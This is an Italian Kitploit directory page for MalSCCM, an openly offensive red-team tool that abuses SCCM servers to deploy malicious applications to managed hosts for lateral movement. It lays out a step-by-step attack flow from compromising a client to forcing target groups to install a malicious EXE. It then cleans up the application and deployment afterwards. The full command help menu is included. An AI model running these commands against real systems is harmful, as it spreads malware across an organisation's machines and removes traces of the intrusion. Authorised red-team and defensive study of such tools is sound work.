Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
MalSCCM — Abusare dei server SCCM per distribuire applicazioni dannose agli host gestiti per movimenti laterali e operazioni di red team. | Kitploit
Strumenti/GitHubGitHub/nettitude/malsccm
ExploitMovimento LateralePenetration TestingRed Teaming
GitHubnettitude/malsccm

MalSCCM

Abusare dei server SCCM per distribuire applicazioni dannose agli host gestiti per movimenti laterali e operazioni di red team.

Vedi Repository
2563834 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

MalSCCM

Questo strumento permette di abusare di server SCCM locali o remoti per distribuire applicazioni dannose agli host che gestiscono. Per utilizzare questo strumento, il processo corrente deve avere diritti di amministrazione sul server SCCM.

Tipicamente, le distribuzioni di SCCM hanno il server di gestione e il server primario sullo stesso host; in tal caso, l'host restituito dal comando locate può essere utilizzato come server primario.

Se così non fosse, sarà necessario compromettere l'host di gestione restituito da locate per poter eseguire nuovamente locate su quell'host e ottenere il nome host del server primario. Una volta ottenuto quello e l'accesso amministrativo, si è pronti per procedere!

Blog

Per maggiori informazioni sull'uso dello strumento, fare riferimento al blog qui sotto.

  • https://labs.nettitude.com/blog/introducing-malsccm/

Crediti

Un enorme ringraziamento a PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM) su cui tutto questo si basa; questo non sarebbe stato possibile senza il lavoro di @harmj0y, @jaredcatkinson, @enigma0x3, @mattifestation.

Flusso dell'attacco

  • Compromettere un client, usare locate per trovare il server di gestione
  • Compromettere il server di gestione, usare locate per trovare il server primario
  • Usare inspect sul server primario per vedere chi si può prendere di mira
  • Creare un nuovo gruppo di dispositivi per le macchine su cui si vuole effettuare il movimento laterale
  • Aggiungere i propri target al nuovo gruppo
  • Creare un'applicazione che punti a un EXE malevolo su una condivisione leggibile da tutti
  • Distribuire l'applicazione al gruppo target
  • Forzare il gruppo target a effettuare il check-in per gli aggiornamenti
  • Profitto...
  • Pulire l'applicazione e la distribuzione
  • Eliminare il gruppo

Menu di aiuto

root@kitploit:~
Commands listed below have optional parameters in <>. 

Attempt to find the SCCM management and primary servers:
    MalSCCM.exe locate

Inspect the primary server to gather SCCM information:
    MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers>

Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users:
    MalSCCM.exe group /create /groupname:example /grouptype:[user|device] </server:PrimarySiteHostname>
    MalSCCM.exe group /delete /groupname:example </server:PrimarySiteHostname>
    MalSCCM.exe group /addhost /groupname:example /host:examplehost </server:PrimarySiteHostname>
    MalSCCM.exe group /adduser /groupname:example /user:exampleuser </server:PrimarySiteHostname>

Create/Deploy/Delete malicious applications:
    MalSCCM.exe app /create /name:appname /uncpath:""\\unc\path"" </server:PrimarySiteHostname>
    MalSCCM.exe app /delete /name:appname </server:PrimarySiteHostname>
    MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 </server:PrimarySiteHostname>
    MalSCCM.exe app /deletedeploy /name:appname </server:PrimarySiteHostname>
    MalSCCM.exe app /cleanup /name:appname </server:PrimarySiteHostname>

Force devices of a group to checkin within a couple minutes:
    MalSCCM.exe checkin /groupname:example </server:PrimarySiteHostname>
Scarica lo strumento